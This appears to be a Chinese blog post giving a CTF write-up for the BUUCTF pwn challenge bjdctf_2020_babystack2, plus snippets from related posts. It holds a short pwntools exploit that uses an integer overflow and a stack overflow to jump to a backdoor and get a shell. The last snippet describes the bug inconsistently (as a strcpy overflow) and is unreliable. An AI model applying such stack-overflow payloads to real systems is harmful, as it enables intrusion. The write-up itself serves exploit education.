bjdctf_2020_babystack2同stack1(整数溢出)

最新推荐文章于 2025-02-18 22:56:03 发布

原创最新推荐文章于 2025-02-18 22:56:03 发布 · 522 阅读

0 ·

CC 4.0 BY-SA版权

pwn 专栏收录该内容

7 篇文章

订阅专栏

博客内容涉及通过整数溢出漏洞，发送负数值触发溢出，结合ida分析，利用特定payload进行远程代码注入，展示了安全漏洞利用与防护的研究。

首先检查一下
在这里插入图片描述打开ida看一下
(int)nbytes是signed int类型后面read 的是unsigned int 类型这里想到整数溢出可以传输一个负数使其溢出
下面是我的脚本

from pwn import*
from LibcSearcher import*
p=remote('node3.buuoj.cn','26189')
p.sendline('-121311')#此处可以随意写入一个负数
payload='a'*0x18+p64(0x400726)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zeeeroo

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF bjdctf_2020_babystack2

2401_88087539的博客

01-30

321

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

[BUUCTF]PWN——bjdctf_2020_babystack2

BangSen1的博客

04-06

1319

bjdctf_2020_babystack2 64位，开启NX保护。运行一下。用IDA打开。找到了后门函数。backdoor=0x400726 查看main函数读入数据的大小由我们输入的参数nbytes控制 nbytes参数的类型是 size_t，它是一个无符号整型。但是第7行又将它转换成了有符号的整型，存在整数溢出漏洞（即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围，从而造成溢出，常用-1来造成溢出） from pwn import * r=remote('nod

参与评论您还未登录，请先登录后发表或查看评论

bjdctf_2020_babystack2

m0sway的博客

04-04

501

bjdctf_2020_babystack2 WriteUp BUU_PWN

【CTF】bjdctf_2020_babystack2

凉水的博客

06-30

762

bjdctf_2020_babystack2

buuctf-bjdctf_2020_babystack（pwn）

2301_81574836的博客

02-18

1024

buuctf-bjdctf_2020_babystack（pwn）题解

bjdctf_2020_babystack【BUUCTF】

qq_41696518的博客

08-26

1141

bjdctf_2020_babystack

buu bjdctf_2020_babystack2 整数溢出、栈溢出

qq_41849152的博客

09-14

292

整数溢出、栈溢出

BUUCTF：bjdctf_2020_babystack2（write up）

qq_44768749的博客

08-24

1756

BUUCTF：bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序，开启了栈不可执行、部分RELRO保护 0x02 运行先输入name的长度，再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路比较nbytes和10的大小，可以利用符号溢出漏洞，输入一个负数，进而输入name的时候可以实现栈溢出跳转到后门函数ge

BUU刷题-Pwn-bjdctf_2020_babystack

一个啥也不会的小菜鸡！

06-21

363

首先利用&nbytes变量控制溢出长度，再使用buf实现溢出就可以了。后门函数地址：backdoor：0x4006E6。

bjdctf_2020_babystack2【BUUCTF】

qq_41696518的博客

08-31

934

bjdctf_2020_babystack2【BUUCTF】

[BUUOJ]bjdctf_2020_babystack2

Do1phln的博客

10-25

270

checksec是64位小端序，IDA分析看没找到明显的输入溢出逻辑，但是找到了后门函数，再仔细观察发现数值里面有强制转换，有一部分从int转到了unsigned int，因此可以初步判定为整型溢出，如果我输入-1即可突破长度为10的限制，所以以此下手即可成功修改返回地址，getshell。

【BUUCTF】bjdctf_2020_babystack2

m0_51251108的博客

12-30

400

【BUUCTF】bjdctf_2020_babystack2 64位，无canary 有后门函数这题思路就是用无符号和有符号整型来绕过10的比较比如：送入一个-1，无符号类型会把它看成一个很大的正整数，是，而有符号则认为是-1 这题size_t是一种无符号整型，下面被强转成有符号，最后又强转成无符号所以可以绕过 exp： from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0

[BUUCTF-pwn]——bjdctf_2020_babystack2

Y_peak的博客

02-22

294

[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址： https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下在IDA中查看一下，注意想要栈溢出，首先需要nbytes足够大。size_t类型在标准C语言库中，是unsigned int类型， 64位 long unsigned int。而%d 是按照int类型读取的，我们读入-1。其实就相当于一个很大的数字，但是可以绕过检查。具体可以了解下整型溢出

bjdctf 2020 babystack2

pondzhang的专栏

05-19

305

from pwn import * p = process('./bjdctf_2020_babystack2') p.sendlineafter("length of your name:\n","-1") payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726) p.sendlineafter("name?\n",payload) p.interactive()

BUU刷题-Pwn-bjdctf_2020_babystack2

一个啥也不会的小菜鸡！

06-21

336

因此可以输入0x80000001=>2147483649，signed int类型被当做负数小于10，read函数中unsigned int类型被当成正整数2147483649。比较nbytes和10的大小，可以利用无符号整数溢出漏洞，输入一个负数，进而输入name的时候可以实现栈溢出跳转到后门函数getshell。nbytes是signed int类型，4字节，但后面read函数输入name时却是unsigned int类型。

buuctfbjdctf_2020_babystack2 1

最新发布

03-19

### 关于 BUUCTF BJDCTF_2020 Babystack2 的解题思路 BABYSTACK2 是一道典型的 ROP（Return-Oriented Programming）题目，主要考察选手对栈溢出漏洞的理解以及如何利用返回地址控制程序执行流程的能力。以下是该题目的分析与解决方法： #### 题目背景 BJDCTF_2020 中的 Babystack2 提供了一个二进制文件和对应的环境配置[^1]。目标是通过堆栈缓冲区溢出来实现任意代码执行。 #### 工具准备为了完成此挑战，需要以下工具： - **GDB (GNU Debugger)**：用于调试二进制文件并观察内存状态。 - **pwntools**：Python 库，简化了 exploit 开发过程中的许多操作。 - **ROPgadget**：帮助查找可用的小工具（gadgets）以构建所需的指令序列。 #### 技术要点解析 ##### 1. 漏洞发现通过对提供的 binary 进行逆向工程可以确认存在一处未受保护的 strcpy() 函数调用，这允许攻击者覆盖函数返回地址从而劫持 CPU 控制流。 ##### 2. 基础设施设置由于现代操作系统默认启用了多种安全机制如 NX bit 和 ASLR ，因此成功实施 ROP 攻击还需要考虑这些因素的影响。具体来说， - 如果开启了 Address Space Layout Randomization(ASLR)，则需找到一种方式泄露基址； - Non-executable stack 则意味着我们不能直接注入 shellcode 而应依赖已有代码片段形成有效载荷。 ##### 3. 构建 Payload 基于上述条件设计 payload 主要分为以下几个部分： - 找到合适的 gadgets 组合来规避 DEP/NX protection 并最终触发 system("/bin/sh") 或类似的命令执行动作 ; - 当前场景下可能涉及到 chain multiple gadgets together 形成完整的功能单元; 下面给出一段简单的 python script 使用 pwntools 来生成这样的输入数据包: ```python from pwn import * context.arch = 'amd64' elf = ELF('./babystack2') rop = ROP(elf) offset = cyclic_find('kaie') # replace with actual offset value found via testing/cyclic pattern generation payload = fit({ offset: rop.chain() }) p = process('./babystack2') p.sendline(payload) p.interactive() ``` 注意以上仅为框架示意, 实际应用时还需填充具体的 gadget 地址等细节信息. #### 总结综上所述,Babystack2是一道综合性较强的CTF赛题,它不仅测试参赛人员对于基础原理掌握程度同时也锻炼其实际动手解决问题能力.